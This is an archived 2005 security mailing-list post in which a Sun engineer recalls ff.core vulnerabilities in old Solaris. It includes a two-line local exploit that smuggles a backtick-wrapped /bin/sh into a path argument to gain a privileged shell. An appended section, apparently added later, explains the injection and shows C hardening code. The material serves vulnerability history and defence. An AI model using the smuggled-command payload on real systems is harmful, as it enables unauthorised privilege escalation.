[VIM] Re: old Solaris ff.core help =) (fwd)

security curmudgeon jericho at attrition.org
Tue Jun 14 19:13:01 EDT 2005

---------- Forwarded message ----------
From: Casper.Dik at Sun.COM
To: security curmudgeon <jericho at attrition.org>
Cc: Steven Christey <coley at mitre.org>
Date: Wed, 08 Jun 2005 09:48:12 +0200
Subject: Re: old Solaris ff.core help =)

>this post:
>This is one of a few mentions of "two vulnerabilities in ff.core". Based
>on the date, the Aug 30, 1994 IFS would be one of the two, but I can't
>find record of the second beyond the somewhat cryptic 101889 patch notes
>and several mail list posts.
>In short, can you confirm there were two vulnerabilities around 1994/1995
>in ff.core? If so, any hint as to what the second was, or the impact?
>Given the age of the program, I don't think it is letting any serious
>cat out of the bag =) This is purely for a historic perspective on

ff.core was a mess and there were certainly several vulnerabilities
in it; I corresponded a lot about this with Sun and then made sure it was
mostly fixed after I joined Sun.

It used popen/system a lot and allowed you to chown random

My old favourite exploit (which I had memorized and could type by hand)
after the initial (botched) fix was:

      mkdir -p '/tmp/rdiskette0/`/bin/sh</dev/tty>/dev/tty 2>&1`'
      ff.core 0 1 '/tmp/rdiskette0/`/bin/sh</dev/tty>/dev/tty 2>&1`' x

There were some symlink issues and there was the ability to rename
random files.
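The injection pattern behind that exploit (a setuid tool pastes a caller-supplied path into a command string and hands it to popen()/system(), so backticks in the path run as the invoking user's shell with the tool's privileges) is shown below as an added example. This is illustration code, not ff.core source and not Sun's fix: the tool path /usr/bin/fsck, the function names, and the assumption that the real device must live under /dev/ are hypothetical. It puts the vulnerable command-building step next to two checks a practitioner would want: an allowlist on the argument, and running the helper with execv() so no shell ever sees the path.

```c
/* Added example: shell command injection through a path argument,
 * and how to avoid it.  Not ff.core source; names are hypothetical. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern: interpolate the caller's path into a command line
 * that is later passed to system()/popen().  Anything the shell
 * interprets (backticks, $( ), ;, |, redirections) in the path runs. */
int build_command(const char *device, char *buf, size_t buflen)
{
    /* /usr/bin/fsck is a placeholder for whatever helper was invoked. */
    return snprintf(buf, buflen, "/usr/bin/fsck %s", device);
}

/* Denylist check: does the argument contain shell metacharacters?
 * Useful as a detection, but incomplete on its own (the list is never
 * guaranteed to match every shell's grammar). */
int has_shell_metachars(const char *s)
{
    return strpbrk(s, "`$;|&<>()\n'\"\\ \t") != NULL;
}

/* Allowlist check (assumption: a legitimate device argument lives under
 * /dev/).  Only a conservative character set is accepted and ".." is
 * rejected, so "/tmp/rdiskette0/`...`" fails before any command runs. */
int device_arg_ok(const char *s)
{
    if (strncmp(s, "/dev/", 5) != 0 || s[5] == '\0')
        return 0;
    for (const char *p = s + 5; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '_' || c == '-' || c == '/' || c == '.'))
            return 0;
        if (p[0] == '.' && p[1] == '.')
            return 0;
    }
    return 1;
}

/* Hardened pattern: never go through a shell.  fork(), build argv[] and
 * execv() the helper directly; the path is one argv element, so backticks
 * in it are just bytes in a filename.  Returns the child's exit status,
 * or -1 on failure to run it. */
int run_tool_noshell(const char *tool, const char *device)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)tool, (char *)device, NULL };
        execv(tool, argv);
        _exit(127);              /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed input in the shape of the posted exploit. */
    const char *evil = "/tmp/rdiskette0/`/bin/sh</dev/tty>/dev/tty 2>&1`";
    char cmd[256];

    build_command(evil, cmd, sizeof cmd);
    printf("command a shell would see: %s\n", cmd);
    printf("metachars: %d  allowlisted: %d\n",
           has_shell_metachars(evil), device_arg_ok(evil));

    /* With execv() the same string is passed literally; /bin/echo just
     * prints it and nothing inside the backticks executes. */
    int rc = run_tool_noshell("/bin/echo", evil);
    printf("execv path exit status: %d\n", rc);
    return 0;
}
```

The allowlist is the check that actually closes the hole: a denylist of metacharacters is easy to get wrong across shells, and the exec-without-shell path removes the interpreter from the picture entirely. Both together are what one would expect after a "botched" first fix.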


